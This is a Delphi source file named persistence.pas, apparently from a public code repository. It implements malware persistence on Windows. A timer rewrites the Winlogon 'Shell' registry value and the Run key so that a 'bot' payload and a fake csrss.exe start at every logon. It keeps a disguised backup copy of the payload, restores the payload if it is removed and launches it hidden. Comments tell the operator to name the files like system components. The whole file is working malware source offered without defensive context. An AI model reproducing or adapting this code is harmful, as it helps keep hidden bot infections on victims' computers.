-
Notifications
You must be signed in to change notification settings - Fork 1
/
persistence.pas
115 lines (102 loc) · 2.89 KB
/
persistence.pas
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
unit persistence;
interface
uses
Windows,SysUtils, registry, Variants, Classes,
Forms, ExtCtrls, shellapi;
type
TForm3 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form3: TForm3;
implementation
{$R *.dfm}
procedure FileCopy(const FSrc, FDst: string);
var
sStream,
dStream: TFileStream;
begin
sStream := TFileStream.Create(FSrc, fmOpenRead);
try
dStream := TFileStream.Create(FDst, fmCreate);
try
{Forget about block reads and writes, just copy
the whole darn thing.}
dStream.CopyFrom(sStream, 0);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
end;
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
// "Shell" = "explorer.exe, scvhost.exe"
procedure doreg(regstr, regstr1, exepath, exepath1: string);
var
EdReg: TRegistry;
opnkey: string;
begin
try
opnkey := 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
// start creating the key in the registry
EdReg := TRegistry.Create;
EdReg.rootkey := HKEY_LOCAL_MACHINE;
if EdReg.OpenKey(opnkey, TRUE) then
begin
EdReg.WriteString(regstr, exepath);
end;
opnkey := 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon';
EdReg := TRegistry.Create;
EdReg.rootkey := HKEY_LOCAL_MACHINE;
if EdReg.OpenKey(opnkey, TRUE) then
begin
EdReg.WriteString(regstr1, exepath1);
end;
finally
EdReg.Free;
end;
end;
// this file should be called SYSCHK.EXE and placed in C:\WINDOWS
// payload should be called MSAudioSv.EXE and placed in C:\WINDOWS
procedure TForm3.FormCreate(Sender: TObject);
begin
Timer1.Enabled := TRUE;
end;
procedure TForm3.Timer1Timer(Sender: TObject);
begin
doreg('', 'shell', '',
'Explorer.exe, Syschk.exe, MSAudioSv.exe, c:\csrss.exe,');
FileCopy('c:\windows\MSAudioSv.exe','c:\windows\SysAudioSv.Manifest');
if not fileexists('c:\windows\MSAudioSv.exe') then
begin
try
// copy spare bot to c:\windows\MSAudioSv.exe
// spare = C:\WINDOWS\SysAudioSv.Manifest
FileCopy('c:\windows\SysAudioSv.Manifest','c:\windows\MSAudioSv.exe');
ShellExecute(form3.Handle, nil, 'c:\windows\MSAudioSv.exe','', nil, sw_HIDE);
except
on E: Exception do
end;
end;
if not fileexists('c:\csrss.exe') then
begin
try
// copy spare bot to c:\windows\MSAudioSv.exe
// spare = C:\WINDOWS\SysAudioSv.Manifest
FileCopy('c:\windows\csr.Manifest','c:\csrss.exe');
ShellExecute(form3.Handle, nil, 'c:\csrss.exe','', nil, sw_HIDE);
except
on E: Exception do
end;
end;
doreg('', 'shell', '',
'Explorer.exe, Syschk.exe, MSAudioSv.exe,c:\csrss.exe,');
end;
end.